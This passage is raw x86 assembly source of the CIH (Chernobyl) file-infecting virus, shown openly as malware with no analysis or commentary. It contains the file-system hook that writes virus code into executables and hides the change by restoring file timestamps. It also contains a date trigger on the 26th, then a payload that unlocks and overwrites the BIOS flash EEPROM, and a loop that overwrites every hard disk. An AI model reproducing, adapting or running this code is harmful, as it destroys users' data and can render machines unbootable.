  1028. jecxz SetFileModificationMark
  1029.  
  1030. mov esi, ecx
  1031. mov eax, 0d601h
  1032. pop edx
  1033. pop ecx
  1034.  
  1035. call edi ; VXDCall IFSMgr_Ring0_FileIO
  1036.  
  1037. jmp LoopOfWriteVirusCodeToFile
  1038.  
  1039. ; ***************************
  1040. ; * Let's Set CF = 1 ==> *
  1041. ; * Need to Restore File *
  1042. ; * Modification Time *
  1043. ; ***************************
  1044.  
  1045. SetFileModificationMark:
  1046. pop ebx
  1047. pop eax
  1048.  
  1049. stc ; Enable CF(Carry Flag)
  1050. pushf
  1051.  
  1052. ; *************************************
  1053. ; * Close File *
  1054. ; *************************************
  1055.  
  1056. CloseFile:
  1057. xor eax, eax
  1058. mov ah, 0d7h
  1059. call edi ; VXDCall IFSMgr_Ring0_FileIO
  1060.  
  1061. ; *************************************
  1062. ; * Need to Restore File Modification *
  1063. ; * Time !? *
  1064. ; *************************************
  1065.  
  1066. popf
  1067. pop esi
  1068. jnc IsKillComputer
  1069.  
  1070. ; *************************************
  1071. ; * Restore File Modification Time *
  1072. ; *************************************
  1073.  
  1074. mov ebx, edi
  1075.  
  1076. mov ax, 4303h
  1077. mov ecx, (FileModificationTime-@7)[esi]
  1078. mov edi, (FileModificationTime+2-@7)[esi]
  1079. call ebx ; VXDCall IFSMgr_Ring0_FileIO
  1080.  
  1081. ; *************************************
  1082. ; * Disable OnBusy *
  1083. ; *************************************
  1084.  
  1085. DisableOnBusy:
  1086. dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
  1087.  
  1088. ; *************************************
  1089. ; * Call Previous FileSystemApiHook *
  1090. ; *************************************
  1091.  
  1092. prevhook:
  1093. popad
  1094.  
  1095. mov eax, dr0 ;
  1096. jmp [eax] ; Jump to prevhook
  1097.  
  1098. ; *************************************
  1099. ; * Call the Function that the IFS *
  1100. ; * Manager Would Normally Call to *
  1101. ; * Implement this Particular I/O *
  1102. ; * Request. *
  1103. ; *************************************
  1104.  
  1105. pIFSFunc:
  1106. mov ebx, esp
  1107. push dword ptr [ebx+20h+04h+14h] ; Push pioreq
  1108. call [ebx+20h+04h] ; Call pIFSFunc
  1109. pop ecx ;
  1110.  
  1111. mov [ebx+1ch], eax ; Modify EAX Value in Stack
  1112.  
  1113. ; ***************************
  1114. ; * After Calling pIFSFunc, *
  1115. ; * Get Some Data from the *
  1116. ; * Returned pioreq. *
  1117. ; ***************************
  1118.  
  1119. cmp dword ptr [ebx+20h+04h+04h], 00000024h
  1120. jne QuitMyVirusFileSystemHook
  1121.  
  1122. ; *****************
  1123. ; * Get the File *
  1124. ; * Modification *
  1125. ; * Date and Time *
  1126. ; * in DOS Format.*
  1127. ; *****************
  1128.  
  1129. mov eax, [ecx+28h]
  1130. mov (FileModificationTime-@6)[esi], eax
  1131.  
  1132. ; ***************************
  1133. ; * Quit My Virus' *
  1134. ; * IFSMgr_FileSystemHook *
  1135. ; ***************************
  1136.  
  1137. QuitMyVirusFileSystemHook:
  1138.  
  1139. popad
  1140.  
  1141. ret
  1142.  
  1143. ; *************************************
  1144. ; * Kill Computer !? ... *^_^* *
  1145. ; *************************************
  1146.  
  1147. IsKillComputer:
  1148. ; Get the Current Day of the Month from BIOS CMOS
  1149. mov al, 07h
  1150. out 70h, al
  1151. in al, 71h
  1152.  
  1153. xor al, 26h ; ??/26/????
  1154.  
  1155. IF DEBUG
  1156. jmp DisableOnBusy
  1157. ELSE
  1158. jnz DisableOnBusy
  1159. ENDIF
  1160.  
  1161. ; **************************************
  1162. ; * Kill Kill Kill Kill Kill Kill Kill *
  1163. ; * Kill Kill Kill Kill Kill Kill Kill *
  1164. ; * Kill Kill Kill Kill Kill Kill Kill *
  1165. ; * Kill Kill Kill Kill Kill Kill Kill *
  1166. ; * Kill Kill Kill Kill Kill Kill Kill *
  1167. ; * Kill Kill Kill Kill Kill Kill Kill *
  1168. ; * Kill Kill Kill Kill Kill Kill Kill *
  1169. ; * Kill Kill Kill Kill Kill Kill Kill *
  1170. ; * Kill Kill Kill Kill Kill Kill Kill *
  1171. ; * Kill Kill Kill Kill Kill Kill Kill *
  1172. ; * Kill Kill Kill Kill Kill Kill Kill *
  1173. ; * Kill Kill Kill Kill Kill Kill Kill *
  1174. ; * Kill Kill Kill Kill Kill Kill Kill *
  1175. ; * Kill Kill Kill Kill Kill Kill Kill *
  1176. ; * Kill Kill Kill Kill Kill Kill Kill *
  1177. ; * Kill Kill Kill Kill Kill Kill Kill *
  1178. ; * Kill Kill Kill Kill Kill Kill Kill *
  1179. ; * Kill Kill Kill Kill Kill Kill Kill *
  1180. ; **************************************
  1181.  
  1182. ; ***************************
  1183. ; * Kill BIOS EEPROM *
  1184. ; ***************************
  1185.  
  1186. mov bp, 0cf8h
  1187. lea esi, IOForEEPROM-@7[esi]
  1188.  
  1189. ; ***********************
  1190. ; * Show BIOS Page in *
  1191. ; * 000E0000 - 000EFFFF *
  1192. ; * ( 64 KB ) *
  1193. ; ***********************
  1194.  
  1195. mov edi, 8000384ch
  1196. mov dx, 0cfeh
  1197. cli
  1198. call esi
  1199.  
  1200. ; ***********************
  1201. ; * Show BIOS Page in *
  1202. ; * 000F0000 - 000FFFFF *
  1203. ; * ( 64 KB ) *
  1204. ; ***********************
  1205.  
  1206. mov di, 0058h
  1207. dec edx ; and al,0fh
  1208. mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
  1209. call esi
  1210.  
  1211. ; ***********************
  1212. ; * Show the BIOS Extra *
  1213. ; * ROM Data in Memory *
  1214. ; * 000E0000 - 000E01FF *
  1215. ; * ( 512 Bytes ) *
  1216. ; * , and the Section *
  1217. ; * of Extra BIOS can *
  1218. ; * be Written... *
  1219. ; ***********************
  1220.  
  1221. lea ebx, EnableEEPROMToWrite-@10[esi]
  1222.  
  1223. mov eax, 0e5555h
  1224. mov ecx, 0e2aaah
  1225. call ebx
  1226. mov byte ptr [eax], 60h
  1227.  
  1228. push ecx
  1229. loop $
  1230.  
  1231. ; ***********************
  1232. ; * Kill the BIOS Extra *
  1233. ; * ROM Data in Memory *
  1234. ; * 000E0000 - 000E007F *
  1235. ; * ( 80h Bytes ) *
  1236. ; ***********************
  1237.  
  1238. xor ah, ah
  1239. mov [eax], al
  1240.  
  1241. xchg ecx, eax
  1242. loop $
  1243.  
  1244. ; ***********************
  1245. ; * Show and Enable the *
  1246. ; * BIOS Main ROM Data *
  1247. ; * 000E0000 - 000FFFFF *
  1248. ; * ( 128 KB ) *
  1249. ; * can be Written... *
  1250. ; ***********************
  1251.  
  1252. mov eax, 0f5555h
  1253. pop ecx
  1254. mov ch, 0aah
  1255. call ebx
  1256. mov byte ptr [eax], 20h
  1257.  
  1258. loop $
  1259.  
  1260. ; ***********************
  1261. ; * Kill the BIOS Main *
  1262. ; * ROM Data in Memory *
  1263. ; * 000FE000 - 000FE07F *
  1264. ; * ( 80h Bytes ) *
  1265. ; ***********************
  1266.  
  1267. mov ah, 0e0h
  1268. mov [eax], al
  1269.  
  1270. ; ***********************
  1271. ; * Hide BIOS Page in *
  1272. ; * 000F0000 - 000FFFFF *
  1273. ; * ( 64 KB ) *
  1274. ; ***********************
  1275. ; or al,10h
  1276. mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
  1277. call esi
  1278.  
  1279. ; ***************************
  1280. ; * Kill All HardDisk *
  1281. ; ***************************************************
  1282. ; * IOR Structure of IOS_SendCommand Needs *
  1283. ; ***************************************************
  1284. ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
  1285. ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
  1286. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1287. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1288. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
  1289. ; ***************************************************
  1290.  
  1291. KillHardDisk:
  1292. xor ebx, ebx
  1293. mov bh, FirstKillHardDiskNumber
  1294. push ebx
  1295. sub esp, 2ch
  1296. push 0c0001000h
  1297. mov bh, 08h
  1298. push ebx
  1299. push ecx
  1300. push ecx
  1301. push ecx
  1302. push 40000501h
  1303. inc ecx
  1304. push ecx
  1305. push ecx
  1306.  
  1307. mov esi, esp
  1308. sub esp, 0ach
  1309.  
  1310. LoopOfKillHardDisk:
  1311. int 20h
  1312. dd 00100004h ; VXDCall IOS_SendCommand
  1313.  
  1314. cmp word ptr [esi+06h], 0017h
  1315. je KillNextDataSection
  1316.  
  1317. ChangeNextHardDisk:
  1318. inc byte ptr [esi+4dh]
  1319.  
  1320. jmp LoopOfKillHardDisk
  1321.  
  1322. KillNextDataSection:
  1323. add dword ptr [esi+10h], ebx
  1324. mov byte ptr [esi+4dh], FirstKillHardDiskNumber
  1325.  
  1326. jmp LoopOfKillHardDisk
  1327.  
  1328. ; ***************************
  1329. ; * Enable EEPROM to Write *
  1330. ; ***************************
  1331.  
  1332. EnableEEPROMToWrite:
  1333. mov [eax], cl
  1334. mov [ecx], al
  1335. mov byte ptr [eax], 80h
  1336. mov [eax], cl
  1337. mov [ecx], al
  1338.  
  1339. ret
  1340.  
  1341. ; ***************************
  1342. ; * IO for EEPROM *
  1343. ; ***************************
  1344.  
  1345. IOForEEPROM:
  1346. @10 = IOForEEPROM
  1347.  
  1348. xchg eax, edi
  1349. xchg edx, ebp
  1350. out dx, eax
  1351.  
  1352. xchg eax, edi
  1353. xchg edx, ebp
  1354. in al, dx
  1355.  
  1356. BooleanCalculateCode = $
  1357. or al, 44h
  1358.  
  1359. xchg eax, edi
  1360. xchg edx, ebp
  1361. out dx, eax
  1362.  
  1363. xchg eax, edi
  1364. xchg edx, ebp
  1365. out dx, al
  1366.  
  1367. ret
  1368.  
  1369. ; *********************************************************
  1370. ; * Static Data *
  1371. ; *********************************************************
  1372.  
  1373. LastVxDCallAddress = IFSMgr_Ring0_FileIO
  1374. VxDCallAddressTable db 00h
  1375. db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
  1376. db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
  1377. db IFSMgr_Ring0_FileIO-UniToBCSPath
  1378.  
  1379. VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
  1380. VxDCallTableSize = ($-VxDCallIDTable)/04h
  1381.  
  1382. ; *********************************************************
  1383. ; * Virus Version Copyright *
  1384. ; *********************************************************
  1385.  
  1386. VirusVersionCopyright db 'CIH v'
  1387. db MajorVirusVersion+'0'
  1388. db '.'
  1389. db MinorVirusVersion+'0'
  1390. db ' TATUNG'
  1391.  
  1392. ; *********************************************************
  1393. ; * Virus Size *
  1394. ; *********************************************************
  1395.  
  1396. VirusSize = $
  1397. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1398. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1399. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1400.  
  1401. ; *********************************************************
  1402. ; * Dynamic Data *
  1403. ; *********************************************************
  1404.  
  1405. VirusGameDataStartAddress = VirusSize
  1406. @6 = VirusGameDataStartAddress
  1407. OnBusy db 0
  1408. FileModificationTime dd ?
  1409.  
  1410. FileNameBuffer db FileNameBufferSize dup(?)
  1411. @7 = FileNameBuffer
  1412.  
  1413. DataBuffer = $
  1414. @8 = DataBuffer
  1415. NumberOfSections dw ?
  1416. TimeDateStamp dd ?
  1417. SymbolsPointer dd ?
  1418. NumberOfSymbols dd ?
  1419. SizeOfOptionalHeader dw ?
  1420. _Characteristics dw ?
  1421. Magic dw ?
  1422. LinkerVersion dw ?
  1423. SizeOfCode dd ?
  1424. SizeOfInitializedData dd ?
  1425. SizeOfUninitializedData dd ?
  1426. AddressOfEntryPoint dd ?
  1427. BaseOfCode dd ?
  1428. BaseOfData dd ?
  1429. ImageBase dd ?
  1430. @9 = $
  1431. SectionAlignment dd ?
  1432. FileAlignment dd ?
  1433. OperatingSystemVersion dd ?
  1434. ImageVersion dd ?
  1435. SubsystemVersion dd ?
  1436. Reserved dd ?
  1437. SizeOfImage dd ?
  1438. SizeOfHeaders dd ?
  1439. SizeOfImageHeaderToRead = $-NumberOfSections
  1440.  
  1441. NewAddressOfEntryPoint = DataBuffer ; DWORD
  1442. SizeOfImageHeaderToWrite = 04h
  1443.  
  1444. StartOfSectionTable = @9
  1445. SectionName = StartOfSectionTable ; QWORD
  1446. VirtualSize = StartOfSectionTable+08h ; DWORD
  1447. VirtualAddress = StartOfSectionTable+0ch ; DWORD
  1448. SizeOfRawData = StartOfSectionTable+10h ; DWORD
  1449. PointerToRawData = StartOfSectionTable+14h ; DWORD
  1450. PointerToRelocations = StartOfSectionTable+18h ; DWORD
  1451. PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
  1452. NumberOfRelocations = StartOfSectionTable+20h ; WORD
  1453. NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
  1454. Characteristics = StartOfSectionTable+24h ; DWORD
  1455. SizeOfScetionTable = Characteristics+04h-SectionName
  1456.  
  1457. ; *********************************************************
  1458. ; * Virus Total Need Memory *
  1459. ; *********************************************************
  1460.  
  1461. VirusNeedBaseMemory = $
  1462.  
  1463. VirusTotalNeedMemory = @9
  1464. ; + NumberOfSections(??)*SizeOfScetionTable(28h)
  1465. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1466. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1467. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1468.  
  1469. ; *********************************************************
  1470. ; *********************************************************
  1471.  
  1472. VirusGame ENDS
  1473.  
  1474. END FileHeader